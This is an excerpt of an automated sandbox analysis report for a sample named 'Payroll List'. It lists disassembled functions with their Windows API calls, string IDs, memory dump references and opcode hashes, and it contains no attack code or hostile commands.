                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0015B6EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: 8c792ca126edb8d00654866c95c9af5c58a6416012d14c02e69b7587dc45aae0
                                                                    • Instruction ID: a320c686fc81226a60bc81027be79b23e29b1037cd8ac1f61235cc3b8d4b3b2e
                                                                    • Opcode Fuzzy Hash: 8c792ca126edb8d00654866c95c9af5c58a6416012d14c02e69b7587dc45aae0
                                                                    • Instruction Fuzzy Hash: A101A271641014ABDB14EBA4D952AFF73B89F25341F100019F922BB281EBA05E1C8BF5
                                                                    Function 0015B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0015B76C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: d87843b25aba5ec68a0d86df050416de07eca5abddd0f4b64158b050d4d8c613
                                                                    • Instruction ID: 7c3e49bad9b23f146f43532afc0168da4a57612e3a22a98538cfb0d5a38c6d3a
                                                                    • Opcode Fuzzy Hash: d87843b25aba5ec68a0d86df050416de07eca5abddd0f4b64158b050d4d8c613
                                                                    • Instruction Fuzzy Hash: 1601D171641114FBDB14EBA4E943EFE73AC9B69341F100019B912B72D2EB605E1D8BB5
                                                                    Function 00167744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp
                                                                    • String ID: #32770
                                                                    • API String ID: 2292705959-463685578
                                                                    • Opcode ID: ef696b96d197f1c110235498a4b2f612a900a429e92226bb67542e22bdd97750
                                                                    • Instruction ID: 491fc761b0dd3a0a6be71640f50ea28a53f153af79ef229a7b0d360fdc1006cf
                                                                    • Opcode Fuzzy Hash: ef696b96d197f1c110235498a4b2f612a900a429e92226bb67542e22bdd97750
                                                                    • Instruction Fuzzy Hash: 81E0927760432427D710AAA5AC49E8BFBACAB51764F010066B919D7181E760E64187D0
                                                                    Function 0015A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0015A63F
                                                                      • Part of subcall function 001413F1: _doexit.LIBCMT ref: 001413FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Message_doexit
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 1993061046-4017498283
                                                                    • Opcode ID: 65d7d0692c17d1daa2474a44cbbf02a47b551f4e2fe094d71daea52c0c397d43
                                                                    • Instruction ID: 0789e5f05c64671c85f4c4c34a5d7a805a941b51f89db8cba8e0d311d1776df8
                                                                    • Opcode Fuzzy Hash: 65d7d0692c17d1daa2474a44cbbf02a47b551f4e2fe094d71daea52c0c397d43
                                                                    • Instruction Fuzzy Hash: 3AD05B313C472873D31436987C1BFC575489F25B65F040026FB4D955D25FE6D99041D9
                                                                    Function 0019AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 0019ACC0
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0019AEBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryFreeLibrarySystem
                                                                    • String ID: WIN_XPe
                                                                    • API String ID: 510247158-3257408948
                                                                    • Opcode ID: 2eb53a4984879575b2799145cc8e9f65d423963cf60797218e8da4d83a6ddd6d
                                                                    • Instruction ID: 6cc781071cc1944d299a3f7fc5cb9806eaa016da3ce6baebc96ff648ea5119dd
                                                                    • Opcode Fuzzy Hash: 2eb53a4984879575b2799145cc8e9f65d423963cf60797218e8da4d83a6ddd6d
                                                                    • Instruction Fuzzy Hash: 56E06DB0C00509DFCF15DBA4E984AECFBB8AF58300F518082E002B6960CB704A88DF62
                                                                    Function 00188698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001886A2
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001886B5
                                                                      • Part of subcall function 00167A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167AD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: bf0f3eaf630e72a740b6a459a25c1c1b2045f13118f38551d76608fecaf27e18
                                                                    • Instruction ID: 8227bab167cac840927cca5c02cce4bd1c033fb8f017a0baed27f342e00609bb
                                                                    • Opcode Fuzzy Hash: bf0f3eaf630e72a740b6a459a25c1c1b2045f13118f38551d76608fecaf27e18
                                                                    • Instruction Fuzzy Hash: 19D02231384314B7F2686370BC0BFC63A189B00B10F000805B30AAA5C0CAE0E980C720
                                                                    Function 001886CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001886E2
                                                                    • PostMessageW.USER32(00000000), ref: 001886E9
                                                                      • Part of subcall function 00167A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167AD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: f8a1d517fe52bf165a70f30095705967159012ef5b957525f7c1da903bbe70a3
                                                                    • Instruction ID: e0e522ec21c4833b4ebfbcfa6f33ce506e5797463369332d68b5cea5ae13e945
                                                                    • Opcode Fuzzy Hash: f8a1d517fe52bf165a70f30095705967159012ef5b957525f7c1da903bbe70a3
                                                                    • Instruction Fuzzy Hash: 96D022313803147BF2686370BC0BFC63A189B05B10F000805B30AEA5C0CAE0E980C724